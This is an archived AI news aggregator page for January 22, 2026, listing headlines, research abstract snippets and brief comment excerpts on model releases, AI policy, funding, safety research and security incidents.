🚀 WELCOME TO METAMESH.BIZ +++ Goldman Sachs discovers AI might be a bubble after everyone already spent the money (shocking analysis from the firm that missed 2008) +++ Two brothers spent two years building text-to-video from scratch while Big Tech burns billions on the same thing +++ Congress wants to treat H100 exports like weapons sales because apparently compute is the new uranium +++ THE FUTURE IS HOMEMADE, EXPORT-CONTROLLED, AND QUESTIONING ITS OWN ROI +++ 🚀 •
🚀 WELCOME TO METAMESH.BIZ +++ Goldman Sachs discovers AI might be a bubble after everyone already spent the money (shocking analysis from the firm that missed 2008) +++ Two brothers spent two years building text-to-video from scratch while Big Tech burns billions on the same thing +++ Congress wants to treat H100 exports like weapons sales because apparently compute is the new uranium +++ THE FUTURE IS HOMEMADE, EXPORT-CONTROLLED, AND QUESTIONING ITS OWN ROI +++ 🚀 •
AI Signal - PREMIUM TECH INTELLIGENCE
📟 Optimized for Netscape Navigator 4.0+
📚 HISTORICAL ARCHIVE - January 22, 2026
What was happening in AI on 2026-01-22
← Jan 21 📊 TODAY'S NEWS 📚 ARCHIVE Jan 23 →
📊 You are visitor #47291 to this AWESOME site! 📊
Archive from: 2026-01-22 | Preserved for posterity ⚡

Stories from January 22, 2026

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
📂 Filter by Category
Loading filters...
🛡️ SAFETY

Claude's New Constitution

+++ Anthropic published Claude's "constitution," a principles-based ethical framework designed to help the AI generalize values rather than blindly follow rules, because apparently scaling requires alignment theater with footnotes. +++

Anthropic's new Claude 'constitution': be helpful, and don't destroy humanity

🛠️ SHOW HN

Show HN: We tested AI agents with 214 attacks that don't require jailbreaking

🛠️ TOOLS

Qwen3-TTS Open Source Release

+++ Qwen3-TTS drops five models across two sizes with voice cloning and design tools in 10 languages, proving Chinese labs understand that controlling the narrative means shipping the goods. +++

Qwen have open-sourced the full family of Qwen3-TTS: VoiceDesign, CustomVoice, and Base, 5 models (0.6B & 1.8B), Support for 10 languages

"Github: https://github.com/QwenLM/Qwen3-TTS Hugging Face: https://huggingface.co/collections/Qwen/qwen3-tts Blog: https://qwen.ai/blog?id=qwen3tts-0115 Paper: [http..."
💬 Reddit Discussion: 70 comments 🐝 BUZZING
🎯 Demand for non-CUDA support • Criticism of model samples • Community contribution and funding
💬 "can we pretty please get support to run this models in llama.cpp, mistral.rs or whatever compiled language that hopefully supports GPU inference beyond CUDA?""Seriously, I sound like a Hallmark card all of a sudden."
🏢 BUSINESS

Goldman Sachs Global Macro Research: Gen AI: too much spend, too little benefit [pdf] (2024)

💬 HackerNews Buzz: 10 comments 👍 LOWKEY SLAPS
🎯 Goldman Sachs report • AI boom insights • Distrust in banking
💬 "The banker wankers got it completely wrong""I take Goldman Sachs reports like this as a strong signal to buy"
🔬 RESEARCH

Privacy Collapse: Benign Fine-Tuning Can Break Contextual Privacy in Language Models

"We identify a novel phenomenon in language models: benign fine-tuning of frontier models can lead to privacy collapse. We find that diverse, subtle patterns in training data can degrade contextual privacy, including optimisation for helpfulness, exposure to user information, emotional and subjective..."
🛠️ SHOW HN

Show HN: Infinate –O(k)constant-time spatial attention for unlimited LLM context

⚖️ ETHICS

NeurIPS Papers with Hallucinated Citations

+++ Fifty-one peer-reviewed papers made it through NeurIPS with 100+ fabricated citations, suggesting citation-checking might benefit from the same rigor we demand of submitted code. +++

[D] 100 Hallucinated Citations Found in 51 Accepted Papers at NeurIPS 2025

"https://gptzero.me/news/neurips [I remember this was shared last month about ICLR where they found hallucinations in submitted papers, but I didn't expect to see them in accepted papers as well](https://preview.redd.it/4td8bz45hxeg1.png?width=1608&format=png&a..."
💬 Reddit Discussion: 26 comments 😐 MID OR MIXED
🎯 Citation errors • LLM usage in papers • Rigor and review process
💬 "citation errors don't necessarily invalidate the rest of the paper""finding citations is really not that hard"
🌐 POLICY

The US House Committee on Foreign Affairs approves a bipartisan bill that calls for arms-sale style congressional oversight of advanced AI chip exports

🛠️ SHOW HN

Show HN: Text-to-video model from scratch (2 brothers, 2 years, 2B params)

⚡ BREAKTHROUGH

Fei Fei Li dropped a non-JEPA world model, and the spatial intelligence is insane

"Fei-Fei Li, the "godmother of modern AI" and a pioneer in computer vision, founded World Labs a few years ago with a small team and $230 million in funding.  Last month, they launched https://marble.worldlabs.ai/, a generative world model that’s not JEPA, but instead ..."
💬 Reddit Discussion: 72 comments 👍 LOWKEY SLAPS
🎯 Scene Generation Quality • Startup Hype vs Performance • Lack of Openness
💬 "This is not a world model.""The environments are so small and incoherent."
🔮 FUTURE

Your brain on ChatGPT: Accumulation of cognitive debt when using an AI assistant

💬 HackerNews Buzz: 121 comments 🐝 BUZZING
🎯 Impact of technology on cognition • Balancing use of AI/technology • Importance of hands-on engagement
💬 "instead of trying to remember from the inside, completely on their own ... not a potion for remembering, but for reminding ... the appearance of wisdom, not its reality""Don't let the AI take over your actual job, but use it as an interactive encyclopedia"
💰 FUNDING

Inferact/vLLM Funding Round

+++ Inferact's $800M valuation validates inference efficiency as AI's most pressing concern, though some engineers suspect we're optimizing the wrong metric while real bottlenecks quietly gather dust. +++

Inferact, founded by the creators of vLLM to create a commercial AI product for cross-hardware efficiency, raised a $150M seed led by a16z at an $800M valuation

🤖 AI MODELS

Microsoft launches new AI model for real-world robotic learning

""Microsoft has introduced a new artificial intelligence model aimed at pushing robots beyond controlled factory environments. The system, called Rho-alpha, targets one of robotics’ long-standing limitations: the inability to adapt to unpredictable, real-world settings. Developed by Microsoft Resear..."
🔬 RESEARCH

Where Do AI Coding Agents Fail? An Empirical Study of Failed Agentic Pull Requests in GitHub

"AI coding agents are now submitting pull requests (PRs) to software projects, acting not just as assistants but as autonomous contributors. As these agentic contributions are rapidly increasing across real repositories, little is known about how they behave in practice and why many of them fail to b..."
⚖️ ETHICS

AI–AI bias: LLMs favor communications generated by large language models

🔬 RESEARCH

Us-vs-Them Bias in Large Language Models

🔬 RESEARCH

The Plausibility Trap: Using Probabilistic Engines for Deterministic Tasks

"The ubiquity of Large Language Models (LLMs) is driving a paradigm shift where user convenience supersedes computational efficiency. This article defines the "Plausibility Trap": a phenomenon where individuals with access to Artificial Intelligence (AI) models deploy expensive probabilistic engines..."
🔬 RESEARCH

Outcome-Based RL Provably Leads Transformers to Reason, but Only With the Right Data

"Transformers trained via Reinforcement Learning (RL) with outcome-based supervision can spontaneously develop the ability to generate intermediate reasoning steps (Chain-of-Thought). Yet the mechanism by which sparse rewards drive gradient descent to discover such systematic reasoning remains poorly..."
🤖 AI MODELS

Is the next leap in AI architectural? Comparing VRAM-hungry Transformers with Compute-intensive Energy-Based Models

"I’ve been reading up on the architecture behind a new demo that uses Energy-Based Models for reasoning tasks instead of standard autoregressive prediction. They released a benchmark here: https://sudoku.logicalintelligence.com/ The concept is that instead..."
🎓 EDUCATION

AI and Developer Productivity: Insights from a 100k-Developer Stanford Study

🔒 SECURITY

I was banned from Claude for scaffolding a Claude.md file?

💬 HackerNews Buzz: 159 comments 😐 MID OR MIXED
🎯 Moderation and Enforcement • Customer Support Issues • Ethical AI Development
💬 "Risk Department Maoism""There isn't enough space in the newspaper for everyone who gets banned to complain"
🏢 BUSINESS

Q&A with recently departed OpenAI VP of Research Jerry Tworek, who claims OpenAI's shift toward more conservative ways made high-risk, pioneering work harder

🔬 RESEARCH

RSNA Large Language Model Benchmark Dataset for Chest Radiographs of Cardiothoracic Disease: Radiologist Evaluation and Validation Enhanced by AI Labels (REVEAL-CXR)

"Multimodal large language models have demonstrated comparable performance to that of radiology trainees on multiple-choice board-style exams. However, to develop clinically useful multimodal LLM tools, high-quality benchmarks curated by domain experts are essential. To curate released and holdout da..."
🔬 RESEARCH

Jet-RL: Enabling On-Policy FP8 Reinforcement Learning with Unified Training and Rollout Precision Flow

"Reinforcement learning (RL) is essential for enhancing the complex reasoning capabilities of large language models (LLMs). However, existing RL training pipelines are computationally inefficient and resource-intensive, with the rollout phase accounting for over 70% of total training time. Quantized..."
🔬 RESEARCH

APEX-Agents

"We introduce the AI Productivity Index for Agents (APEX-Agents), a benchmark for assessing whether AI agents can execute long-horizon, cross-application tasks created by investment banking analysts, management consultants, and corporate lawyers. APEX-Agents requires agents to navigate realistic work..."
🔬 RESEARCH

The Side Effects of Being Smart: Safety Risks in MLLMs' Multi-Image Reasoning

"As Multimodal Large Language Models (MLLMs) acquire stronger reasoning capabilities to handle complex, multi-image instructions, this advancement may pose new safety risks. We study this problem by introducing MIR-SafetyBench, the first benchmark focused on multi-image reasoning safety, which consis..."
🛠️ TOOLS

Beyond Vendor Lock-In – A Framework for LLM Sovereignty

🔬 RESEARCH

InT: Self-Proposed Interventions Enable Credit Assignment in LLM Reasoning

"Outcome-reward reinforcement learning (RL) has proven effective at improving the reasoning capabilities of large language models (LLMs). However, standard RL assigns credit only at the level of the final answer, penalizing entire reasoning traces when the outcome is incorrect and uniformly reinforci..."
🔬 RESEARCH

A Systematic Analysis of Chunking Strategies for Reliable Question Answering

"We study how document chunking choices impact the reliability of Retrieval-Augmented Generation (RAG) systems in industry. While practice often relies on heuristics, our end-to-end evaluation on Natural Questions systematically varies chunking method (token, sentence, semantic, code), chunk size, ov..."
🔬 RESEARCH

CLEANER: Self-Purified Trajectories Boost Agentic Reinforcement Learning

"Agentic Reinforcement Learning (RL) has empowered Large Language Models (LLMs) to utilize tools like Python interpreters for complex problem-solving. However, for parameter-constrained models (e.g., 4B--7B), the exploration phase is often plagued by frequent execution failures, creating noisy trajec..."
🔬 RESEARCH

Automated Rubrics for Reliable Evaluation of Medical Dialogue Systems

"Large Language Models (LLMs) are increasingly used for clinical decision support, where hallucinations and unsafe suggestions may pose direct risks to patient safety. These risks are particularly challenging as they often manifest as subtle clinical errors that evade detection by generic metrics, wh..."
🔬 RESEARCH

Google study finds DeepSeek, Alibaba models mimic human collective intelligence

🛠️ SHOW HN

Show HN: CausaNova – Deterministic runtime for LLM constraints via Ontology

📊 DATA

Science Is Drowning in AI Slop

🔬 RESEARCH

Overcoming In-Memory Bottlenecks in Graph Foundation Models via Retrieval-Augmented Generation

"Graph Foundation Models (GFMs) have emerged as a frontier in graph learning, which are expected to deliver transferable representations across diverse tasks. However, GFMs remain constrained by in-memory bottlenecks: they attempt to encode knowledge into model parameters, which limits semantic capac..."
🔬 RESEARCH

Lost in the Prompt Order: Revealing the Limitations of Causal Attention in Language Models

"Large language models exhibit surprising sensitivity to the structure of the prompt, but the mechanisms underlying this sensitivity remain poorly understood. In this work, we conduct an in-depth investigation on a striking case: in multiple-choice question answering, placing context before the quest..."
🔬 RESEARCH

HALT: Hallucination Assessment via Latent Testing

"Hallucination in large language models (LLMs) can be understood as a failure of faithful readout: although internal representations may encode uncertainty about a query, decoding pressures still yield a fluent answer. We propose lightweight residual probes that read hallucination risk directly from..."
🔬 RESEARCH

The Flexibility Trap: Why Arbitrary Order Limits Reasoning Potential in Diffusion Language Models

"Diffusion Large Language Models (dLLMs) break the rigid left-to-right constraint of traditional LLMs, enabling token generation in arbitrary orders. Intuitively, this flexibility implies a solution space that strictly supersets the fixed autoregressive trajectory, theoretically unlocking superior re..."
🔬 RESEARCH

V-CAGE: Context-Aware Generation and Verification for Scalable Long-Horizon Embodied Tasks

"Learning long-horizon embodied behaviors from synthetic data remains challenging because generated scenes are often physically implausible, language-driven programs frequently "succeed" without satisfying task semantics, and high-level instructions require grounding into executable action sequences...."
🔬 RESEARCH

Metadata Conditioned Large Language Models for Localization

"Large language models are typically trained by treating text as a single global distribution, often resulting in geographically homogenized behavior. We study metadata conditioning as a lightweight approach for localization, pre-training 31 models (at 0.5B and 1B parameter scales) from scratch on la..."
🔬 RESEARCH

A model of errors in transformers

"We study the error rate of LLMs on tasks like arithmetic that require a deterministic output, and repetitive processing of tokens drawn from a small set of alternatives. We argue that incorrect predictions arise when small errors in the attention mechanism accumulate to cross a threshold, and use th..."
🏢 BUSINESS

Q&A with Yann LeCun on his new Paris-based startup Advanced Machine Intelligence, leaving Meta, real-world applications for world models, robotics, and more

💰 FUNDING

Austin-based Neurophos, which develops a photon-based “Optical Processing Unit” to replace GPUs in AI training, raised $110M led by Bill Gates' Gates Frontier

🔬 RESEARCH

Which Reasoning Trajectories Teach Students to Reason Better? A Simple Metric of Informative Alignment

"Long chain-of-thought (CoT) trajectories provide rich supervision signals for distilling reasoning from teacher to student LLMs. However, both prior work and our experiments show that trajectories from stronger teachers do not necessarily yield better students, highlighting the importance of data-st..."
🔬 RESEARCH

BayesianVLA: Bayesian Decomposition of Vision Language Action Models via Latent Action Queries

"Vision-Language-Action (VLA) models have shown promise in robot manipulation but often struggle to generalize to new instructions or complex multi-task scenarios. We identify a critical pathology in current training paradigms where goal-driven data collection creates a dataset bias. In such datasets..."
🔒 SECURITY

OpenAI API Logs: Unpatched data exfiltration

💬 HackerNews Buzz: 1 comments 😐 MID OR MIXED
🎯 Security vulnerabilities • Data exfiltration • Log viewer design
💬 "It's not impossible and probably signals a bigger issue which is they shouldn't render Markdown by default""Their log viewer should not be rendering Markdown images in a way that can leak data to third parties"
🌐 POLICY

South Korea enacts the AI Basic Act, which it says includes the world's first comprehensive set of laws regulating AI, as startups warn of compliance burdens

🛠️ SHOW HN

Show HN: First Claude Code client for Ollama local models

💬 HackerNews Buzz: 4 comments 🐝 BUZZING
🎯 Alternative Anthropic API • Existing Ollama Integrations • Competing Claude Code Agents
💬 "one less piece of infrastructure to worry about""Claude Code by setting a simple environment variable"
🔬 RESEARCH

Fine-tuned Qwen3-14B on 10k DeepSeek traces: +20% on security benchmark

"I work as a security auditor (basically a bug hunter) and LLMs have become the principal tool at work, like in most of IT. But token usage is huge, and it's becoming problematic as it is taking a big part of the earnings of most audit shops. So I fine-tuned Qwen3-14B with about +10,000 bug-huntin..."
💬 Reddit Discussion: 12 comments 🐐 GOATED ENERGY
🎯 Dataset Preparation • Model Fine-tuning • Exploit Writing
💬 "Can you post the dataset and training recipe too?""GLM 4.7 flash can be used in agents like roo"
🛠️ TOOLS

Vargai/SDK – JSX for AI Video. Declarative Programming Language for Claude Code

🔬 RESEARCH

Rethinking Video Generation Model for the Embodied World

"Video generation models have significantly advanced embodied intelligence, unlocking new possibilities for generating diverse robot data that capture perception, reasoning, and action in the physical world. However, synthesizing high-quality videos that accurately reflect real-world robotic interact..."
🛠️ SHOW HN

Show HN: BrowserOS – "Claude Cowork" in the browser

💬 HackerNews Buzz: 13 comments 🐐 GOATED ENERGY
🎯 Browser-based agents • Cloud/local hybrid execution • Secure agent integration
💬 "we're adding browser-level guardrails (think IAM for agents)""the biggest unlock for users is running at scale, so just being able to launch a hundred cloud browsers, do a task, and return results while you do other things"
🔧 INFRASTRUCTURE

Mana LLM OS

💬 HackerNews Buzz: 10 comments 🐝 BUZZING
🎯 Custom Personal Apps • Cloud File System • Dynamic OS
💬 "evolves dynamically with the user""makes something like claude code but with ui possible"
🎯 PRODUCT

Google rolls out Personal Intelligence in AI Mode to access users' Gmail and Google Photos data for more tailored responses, for US Pro and Ultra subscribers

🛠️ SHOW HN

Show HN: Infrastructure for multi-agent AI memory

🔒 SECURITY

Deaths Linked to AI Chatbots

💬 HackerNews Buzz: 5 comments 😤 NEGATIVE ENERGY
🎯 Suicide rates • AI responsibility • Mental health issues
💬 "every year we'd expect 77,000 suicides by people who'd used the service in the last 7 days""many founders stuck in loops of planning with AI, reinforcing banal beliefs and creating schizophrenia-like symptoms"
🛠️ TOOLS

OpenUI: Open-source control center for AI agents

🛠️ TOOLS

How Claude Code Is Reshaping Software—and Anthropic

"External link discussion - see full content at original source."
🛠️ SHOW HN

Show HN: Ably AI Transport - a transport layer for agentic apps

🛠️ SHOW HN

Show HN: I built a sandboxed VM for letting AI agents go wild without risks

🦆
HEY FRIENDO
CLICK HERE IF YOU WOULD LIKE TO JOIN MY PROFESSIONAL NETWORK ON LINKEDIN
🤝 LETS BE BUSINESS PALS 🤝